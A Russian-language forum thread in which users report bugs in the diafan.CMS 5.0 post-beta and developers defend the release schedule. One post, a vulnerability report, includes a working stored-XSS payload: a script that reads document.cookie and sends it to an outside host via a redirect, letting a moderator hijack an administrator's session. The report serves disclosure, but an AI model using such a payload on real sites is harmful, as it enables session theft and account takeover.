Вход • Регистрация

diafan.CMS 5.0 postbeta

Тема закрыта.

  • 28 марта 2012 г.
  • В продолжении темы diafan.CMS 5.0 beta.
    Господа, бета-пакет diafan.CMS 5.0 со всеми изменениями из предыдущей темы приложим сюда чуть позже.
    Мы исправили все, о чем было сказано теми, кто тестировал бету.

    Сообщения типа
    Цитата
    А что 1 апреля все баги будут исправлены? Просто хочу купить лицензии, но меня так вышеперечисленное смущает. На других цмс, в момент выхода релиза, нет таких баталий. У одного так, у другого робит, у третьего не пашет. Как-то несерьезно ребята. /к разработчикам/
    вообще не понятны. Если взять 5.0 и использовать ее в рамках функционала 4.5, то багов нет, CMS стабильна. Все что всплывает - из нового функционала и новых модулей. И это совершенно естественно и справедливо. Эти модули просили у нас вы, наши пользователи, и каждый руководствуется своими представлениями о работе того или иного функционала. Невозможно создать идеальный модуль с нуля опираясь только на теорию. Нужна практика. после внедрения модуля проходит несколько месяцев работы на десятках реальных сайтов, прежде чем он превратиться в нормальный инструмент. Так всегда было и будет.

    Кстати, лично Вы, Дима (agatahttp), 1-го апреля лицензию будете покупать за 7000 рублей, а не за 2000. Так что ждите, ждите...
  • 28 марта 2012 г.
  • Цитата
    Но почему так много очевидных багов после внутреннего тестирования?
    Каких багов? С купонами? Или с правами пользователей-модераторов на сайте?
    Я еще раз повторюсь: все новые функции мы с нуля не отладим - это 100%. Релиз выйдет с тем, что мы исправим из найденного тестирующими. Если что-то будет всплывать потом, будем исправлять по ходу. Для этого есть техподдержка и есть автообновление.
    И где баги-то? Что код РК не работает как купон??? Или что если применить два купона, они наслаиваются, скидка на скидку? А что тут бажного? Это просто вариант решения: можно либо замещать первую скидку, либо прибавлять еще одну... В любом случае, как скажет большинство, так и сделаем. Но в рабочем порядке.
    • 28 марта 2012 г.
    • какие баги на внутреннем тестировании ?
      Например подключение скриптов JS - в каталоге /js/ одни версии скриптов а в коде подключаются другие. Или вы другую версию CMS внутренне тестировали ?

      Виталик, Вы напрасно воспринимаете так болезненно подобные вопросы. Вы дали систему на тестирование, выявились баги - это все понятно, много нового.
      Но для престижа системы и ее процветания лучше отказаться на время от выпуска новой версии.
      • 28 марта 2012 г.
      • Цитата
        Например подключение скриптов JS - в каталоге /js/ одни версии скриптов а в коде подключаются другие. Или вы другую версию CMS внутренне тестировали ?
        Именно со скриптами накладочка вышла. Я лично это замечание делал, Гарик его исправил, но в гит не загрузил. А пакет уже скрутили. Потом уже загрузили исправления пачкой в очередной пакет.
        Причем мы внутреннее тестирование не останавливали, просто параллельно дали пакет в паблик. Это вот кто буянил?
        Цитата
        Да дайте партнерам, мы то же потестим)

        Так что больше половины, о чем все писали в теме, мы нашли сами и уже исправили к моменту жалоб в топике.
      • 28 марта 2012 г.
      • Оффтоп:
        Цитата
        Виталик, Вы напрасно воспринимаете так болезненно подобные вопросы.

        Соглашусь. Виталий, я конечно дико извиняюсь, но вы действительно слишком резко реагируете на замечания пользователей. И речь сейчас не о замечаниях про бету, а в общем. Иногда не хочется даже в дискуссию с вами вступать - страшно, боюсь напороться :) Немного больше любви и терпимости к пользоватлеям :)
        • 28 марта 2012 г.
        • Вообще, конечно, к вам, ребята, у меня нет претензий. Ни к Роману, ни к Азату. Вы ребята деловые, толковые
          А вот подобные снисходительные сообщения
          Цитата
          Так что вы уж парни и девушки, давайте хоть к первому апреля бету нормальную.
          , конечно выбешивают. Работаешь, работаешь, а тут тебе как двоечнику-второгоднику тоном как будто "Давай-ка ты хоть алфавит к третьему классу выучи, на что ты еще способен"...
          • 29 марта 2012 г.
          • Судя по количеству смайликов и аватару вы Виталий тоже любите улыбаться и шутить ;) Охотно поверю, что не всегда мой английский юмор адекватно воспринимается, особенно в подобных нервных темах :)
            Хотя про школьников это вы метко подметили. Иногда такое впечатление действительно складывается. Сам работаю полжизни в подобных Диафану коллективах. Прекрасно представляю царящую там атмосферу и степень взаимоотношений :) При этом уверен, что все вы уже довольно матерые профи, особенно в том, что касается вашего детища (ЦМС). Именно поэтому и про "альфу" было в сообщении. Очень подмывало спросить, что же вы там натестировали в ней при закрытом тесте. Но теперь вижу прекрасно, что в свежих бетах далеко не только те исправления, которые находит наша скромная компания. Роет землю еще и ваш коллектив. Так что, молодцы, давайте жить дружно :)
  • 28 марта 2012 г.
  • Цитата
    Другой вопрос, что по срокам вряд ли уложится исправление до 1 апреля.
    Все, о чем было написано в теме про бету, мы исправили. Если что-то еще найдется, пишите. Успеем, сделаем до 1-го. Не успеем, сделаем потом. Это нормально. Иначе эту бету можно гонять до нового года, выикивая по "косяку" в день...
    Цитата
    Ну будем верить в техподдержку :)
    Так всегда было. Во всех версиях. Для того техподдержка и нужна.
  • 28 марта 2012 г.
  • Предложений было очень много, и разработчики их все реализовали.
    Ни один подобный продукт не подвергался такой глубокой переработке за такой короткий срок. Давайте вспомним как например выходил тот же Drupal 7 - они на год заморозили код и его тестировали.

    Поэтому может лучше в 5 версию включить то что уже уверенно работает, отложить ее выпуск, остальное выделить в режим бетты и спокойно тестировать и исправлять поэтапно. Например в течении какого-то времени тестируем кабинет пользователя. Для этого выделить отдельные ветки форума только по текущему тестированию.

    А разработчикам надо отдохнуть на выходные в день смеха (Марина ночью файлы исправленные заливает - это говорит о том что программисты работают ночами).

    И вы представляете, что если сейчас выпустить 5-ку - техподдержку завалят вопросами.
    • 28 марта 2012 г.
    • Роман, это нормально! Выпуск 4.3 - всплеск запросов в ТП. Выпуск 4.4 - завал. 4.5 - скачок... Выложить график обращений в ТП? Там скачки в апреле и октябре. Все как всегда. Нам не привыкать.
    • 28 марта 2012 г.
    • Цитата
      Поэтому может лучше в 5 версию включить то что уже уверенно работает
      Хотя вот коды РК мы выключили. Тут Вы правы. Кому надо, спросят, скажем как включить. Это будет проще, чем рассказывать всем, для чего это нужно.
    • 28 марта 2012 г.
    • Цитата
      Например в течении какого-то времени тестируем кабинет пользователя. Для этого выделить отдельные ветки форума только по текущему тестированию.
      Роман, я уж не знаю, какой опыт в тестировании у Вас, но Ваше предложение не лучший вариант. Все самое сладкое получается не при тестировании, а в реальной среде.
      Потому, что лично я уж сколько тестировал 5.0, и то под конец уже вешался. Потому, что глаз замыливается через пару дней, а заполнять одно и тоже в 147-ой раз две недели подряд - руки опускаются. А если еще надо из пальца высосать контент и ситуации для теста, еще и в разной последовательности действия проделать - вообще застрелиться охота!
      Пусть как всегда - пользователи установили на 50 реальных сайтов различной тематики, начиали заполнять. Всплыли косяки - техподдержка - мы исправили, в автообновлении все доступно.
  • 28 марта 2012 г. , редакция: 28 марта 2012 г.
  • Меньше слов - больше дела. Документация по новым функциям не готова еще? Может дадите ознакомиться до 1 апреля? Глядишь успеем еще чего накопать.

    Цифровой товар, куплен (вручную статус выпонен). Пришло письмо пользователю
    "Спасибо за покупку. Файл доступен по ссылке в течение часа." И усё. Ссылки ни в письме ни в личном кабинете. Последнюю бету не ставил, сил уже нету их ставить :) Но подозреваю что там так же.
  • 29 марта 2012 г.
  • Виталий - прислушайтесь, что вам говорят и тихо сделайте выводы. Чем больше писанины, тем дальше падаешь. Серьезные дела именно так и делаются. Что-то не успел, не доделал - получай предъяву. Не в обиду сказано. Удачи в бете.
  • 29 марта 2012 г.
  • Ребята у кого визуальный редактор не работает? У меня на денвере не хочет. Во всех браузерах тестил.
    • 29 марта 2012 г.
    • Да ёлы палы - 150 тыщь раз в 100 ветках объясняли. На некоем подобии хостинга (см. Denwer) визуальный редактор адекватно пахать не будет. Ставьте на нормальный хостинг.
    • 29 марта 2012 г.
    • Петр, Вы сразу пишите, работает ли визуальный редактор на Денвере у других CMS. Тогда будет ясно где искать причину.
    • 29 марта 2012 г.
    • Я все же подозреваю, что причина в том, что визуальник отключен для пользователя (теперь этом настраивается не в параметрах сайта, а при редактировании пользователя).
      Подозреваю, потому что я уже писала свое предположение, но Петр не ответил, похоже не заметил.
  • 29 марта 2012 г. , редакция: 29 марта 2012 г.
  • RC (rctrance) уже поднимал этот вопрос, но в новой бете пока все тоже самое
    А именно
    1. Даем права доступа модератору на просмотр-правку-удаление раздела Обратная связь
    2. Модератор редактирует любое сообщение, дописывая туда JavaScript код
    Код
    <script>
    var c = document.cookie;
    location.href="http://test.ru/index.php?c=" + c;
    </script>

    3. Админ заходит на страницу этого сообщения и у него уводят cookie

    Аналогично можно внедрить код и в Вопрос-Ответ, но при этом он будет работать не в админке а в пользовательской части
  • 29 марта 2012 г.
  • Создаем блок, добавляем его в меню - все создается
    Удаляем блок - не удаляется из админки и из меню.
  • 29 марта 2012 г.
  • Вопрос - мультивалютность в админке есть, а как вывести блок переключения валют ?
    • 29 марта 2012 г. , редакция: 29 марта 2012 г.
    • Мультивалютность пока только для галочки. Там же написано в описании внутри, что цены выводятся ТОЛЬКО в основной валюте.
      • 29 марта 2012 г.
      • К слову о мультивалютности. Еще один подводный камень нашелся. У товара цена задана в евро. Показана в рублях. В режиме прямого редактирования на фронте сайта меняем товару цену. К настройках товара она теперь задана в основной валюте. На первый взгляд логичный результат. Но на второй, нелогичный подход. Цена на фронте должна редактироваться в той валюте, которая в настройках товара.
  • 29 марта 2012 г.
  • Доступа к странице пользователя нет ни у кого, в том числе и у админа.
    • 30 марта 2012 г.
    • А можете уточнить проблему? Я Вот как смотрю. Страница пользователя Кукушкина Адольфа из примеров на форуме: http://site.ru/users/?kukushkin доступна всем
      • 30 марта 2012 г.
      • Да, конечно.
        После установки системы при переходе на страницу "Страница пользователя" http://site.ru/users/ выдается ошибка 404. Например перейдите на просмотр этой страницы прямо из дерева страниц админки.

        А со страницей пользователя, например http://site.ru/users/?kukushkin все в порядке


  • 29 марта 2012 г. , редакция: 29 марта 2012 г.
  • Если товар цифровой... Или напишите возле галочки, что она служит для того, чтоб файл удалился при сохранении товара, или что еще лучше просто поставьте вместо нее крестик, как в других разделах админки. Ладно бы еще мультифайловость была.

    Ссылка на купленный файл по прежнему нигде не появляется. В почту не приходит (Бету до последней обновлял синхронизацией файлов).
    • 29 марта 2012 г.
    • Обновите сообщение "Сообщение пользователю о купленных файлах" в настройках на:

      Здравствуйте!<br>Вы оформили заказ на сайте %title (%url):<br><br>Номер заказа: %id<br>Файлы можно скачать по ссылкам в течении часа: %files<br><br>Спасибо за Ваш заказ!

      при инсталле модуля это уже учтено
      • 29 марта 2012 г.
      • Спасибо, почти заработало :) Может конечно если инстальнуть с нуля вообще всё красиво будет, но пока так:

        Здравствуйте!
        Вы оформили заказ на сайте ******** (*****.ru/Shop3):

        Номер заказа: 5
        Файлы можно скачать по ссылкам в течении часа:
        Наименование товара _LANG_SHOP_GOOD_LINK
        Цифровой товар http://******.ru/Shop3/shop/?action=file

        Звёзды вписал я, а вот природа _LANG_SHOP_GOOD_LINK непонятна
  • 29 марта 2012 г. , редакция: 29 марта 2012 г.
  • Копка "Сделать активным/неактивным" не работает в разделе скидка. Может потому, что по другому называется внутри?
  • 29 марта 2012 г.
  • ОТКУДА начала браться запятая? Естественно цену она убивает при изменении статуса заказа.
  • 30 марта 2012 г.
  • проверьте правильность работы пагинатора комментариев.
    набил 3 комента под админом в новостях, изменил вывод разбивки с 50 на 2, пропала форма и вместо нее - "Чтобы комментировать, зарегистрируйтесь или авторизуйтесь", хотя 1. авторизован, 2. снята галка "Только для зарегистрированных пользователей",
    на всякий случай, так как не знаю как реализовано, пишу, что ссылку на вторую страницу не выдало.
    • 30 марта 2012 г.
    • Разбивки на страницы теперь нет. Комментарии идут деревом как на этом форуме. "Максимальное количество комментариев на странице" это именно ограничение на размер дерева. Надпись, конечно, исправим, не должно быть ее.
      • 30 марта 2012 г.
      • не савсем понял...
        Цитата
        это именно ограничение на размер дерева

        т.е. если стоит 50, то после 50-ти коментов изчезает форма и коментарии больше не возможны?
        • 30 марта 2012 г.
        • все верно
          • 30 марта 2012 г.
          • пост конечно можно удалить, но проблема все-же остается.
            так как мне переводить с 4.2 на 5.0 если у меня портянки под 150-200 комментов?
            • 30 марта 2012 г.
            • Поставьте 1000
              • 30 марта 2012 г. , редакция: 30 марта 2012 г.
              • а лучше 2000

                в общем я понял...
                и решил, что ставить буду 4.5, а ставить 5.0 и еженедельно его обновлять после исправлений нет никакого смысла.
                сегодня уже на новый домен поставил 4.5.

                у меня тогда такой вопрос, сколько денег встанет мне конвертация дампа базы с 4.2 на 4.5? я отдаю дамп 4.2 и получаю 4.5.
                у меня с 4.2 на 4.3 не переходит на автомате.
  • 30 марта 2012 г.
  • по пользователям:
    1.зачем делать активные ссылки на пользователей, если они 404?
    2.для не зарегистрированных есть возможность написать пользователю, БЕЗ каптчи(ее нет там), сообщение отправилось с выводом 404, непонятки с кодировкой или хз с чем - � (�) � (�)30.03.2012.
    бэта5
    • 30 марта 2012 г.
    • А можете дать посмотреть сайт с первой проблемой? Доступ можете кинуть в техподдержку или дамп базы.
      • 30 марта 2012 г. , редакция: 30 марта 2012 г.
      • кинул доступ в тикет

        зы странно, сейчас уже не 404
  • 30 марта 2012 г.
  • В редакторе не грузятся изображения. Ни по одному ни мультизагрузкой.

    Уже и удалял папку userfiles и вручную создавал новую. И владельца менял. И права 755 и 777 ставил. Не помогает. Если грузить по одному, картинка вроде как заливается но не отображается http://clip2net.com/s/1KIen

    Если использовать мультизагрузку, то пишет что изображения не загружены
    http://clip2net.com/s/1KIfj
  • 30 марта 2012 г.
  • Подскажите, а где можно скачать документацию для диафан 5? Или когда выйдет?
    • 30 марта 2012 г.
    • Тут админы есть? У вас объявление о срочности приобретения лицензии. Мне интересно, что я получу 1 апреля?! Проблемы и неизвестное копание кода без доков или готовый продукт.
      • 30 марта 2012 г.
      • Еще раз повторяю для всех: мы прилично переработали CMS, даже неожиданно для себя. Недочеты из нового функционала будут всплывать еще несколько месяцев, не меньше! Все будет решаться техподдержкой и автообновлениями.
        И так было всегда! 4.2 - 4.3, 4.3 - 4.4 и т.д. По поводу 4.5 до сих пор приходят в техподдержку сообщения о глюках, вот только вчера, например, была исправлена ошибка с формированием путей к файлам в мультизычности из блока фотографий. Это нормально!!! Это ПО. Откройте Windows, "обновления" и посмотрите, сколько и как часто выходят патчи к выпущенному релизу ОС.
        Документацию мы обновлять начнем после 01.04. Если будут вопросы - есть ТП, все как всегда.
  • 30 марта 2012 г. , редакция: 30 марта 2012 г.
  • А почему нельзя добавить заказ из "админки"?
    И вообще что-то страшное твориться... Если честно я вообще не вижу ни какой большой разницы между новой и старой версией diafan
    • 30 марта 2012 г.
    • Цитата
      А почему нельзя добавить заказ из "админки"?
      Было предложение "редактировать" заказ из админки, с удалением/добавлением в него товаров. В обсуждении сошлись, что создания заказа с сайта достаточно.
      Цитата
      Если честно я вообще не вижу ни какой большой разницы между новой и старой версией diafan
      А должны видеть? Это хорошо, что не видите? Или плохо? Смысл этого заявления я лично вообще не понял.
  • 30 марта 2012 г.
  • Виталий!) есть вопрос) в новой версии диафана сделали сортировку в магазине по дополнительным характеристикам?)
    • 31 марта 2012 г.
    • Угу, конечно. Обещали же, и статус стоит "выполнено" в вишлисте
      • 31 марта 2012 г.
      • Виталий, справедливости ради, в вишлисте у этого предложения стоит статус "обрабатывается" : ))

        http://clip2net.com/s/1KSGK
  • 31 марта 2012 г.
  • Добрый день!
    У меня вопрос - "желание": Есть возможность добавить функцию логиниться (или регистрироваться) через аккаунты социальных сетей?
    Типа "Войти через Facebook, VK, Twitter" (остальное - moi krud, moi mir, odnoklassniki - роль не играют)...

    Благодарю за ответ!
    • 31 марта 2012 г.
    • Нет, пока это предложение висит не реализованным.
      • 31 марта 2012 г.
      • Марина, а сортировку в магазине по дополнительным характеристикам будет в диафан5?
        http://clip2net.com/s/1KSGK
        • 31 марта 2012 г.
        • Читайте внимательней!
          Цитата
          Виталий!) есть вопрос) в новой версии диафана сделали сортировку в магазине по дополнительным характеристикам?)

          Цитата
          Угу, конечно. Обещали же, и статус стоит "выполнено" в вишлисте
          • 31 марта 2012 г.
          • Влад, а вы теперь пройдите в вишлист и посмотрите на статус этого предложения.

            /wishlist/#wishlist161

            К чему собственно и приложен скриншот.

            Статус у этого моего предложения - "обрабатывается", в то время как Виталий сказал что УЖЕ реализовано.

            Как говорится, "нипанятна" : )))
            • 31 марта 2012 г.
            • Евгений, это формальности. Все, что "обрабатывается" - обрабатывается пару месяцев. Это включено в план в начале января, принято в работу и реализовано. Статусы "обрабатываются" все сменятся на "реализовано". Вы же видели бету? Есть там Ваше предложение? Есть

Новости

  • 24 апреля, среда
  • В новой сборке совершили революцию в структурировании кастомизированной информации в шаблонах, добавили авторегистрацию пользователей, усовершенствовали защиту от спама, актуализировали накопительную скидку, а также улучшили производительность и стабильность работы системы.
  • 12 января
  • После выхода сборки 7.1 мы выпустили уже три патча, в каждом из которых улучшаем административную часть сайта. Сборка DIAFAN.CMS 7.1.3 уже доступна к установке. 
  • 15 декабря 2023 г.
  • Подводим итоги 2023 года. Выпустили новую сборку DIAFAN.CMS 7.1.1, вводим новые тарифы на аренду сайта и коммерческую поддержку и автообновления с января 2024 г., строим планы на будущий год.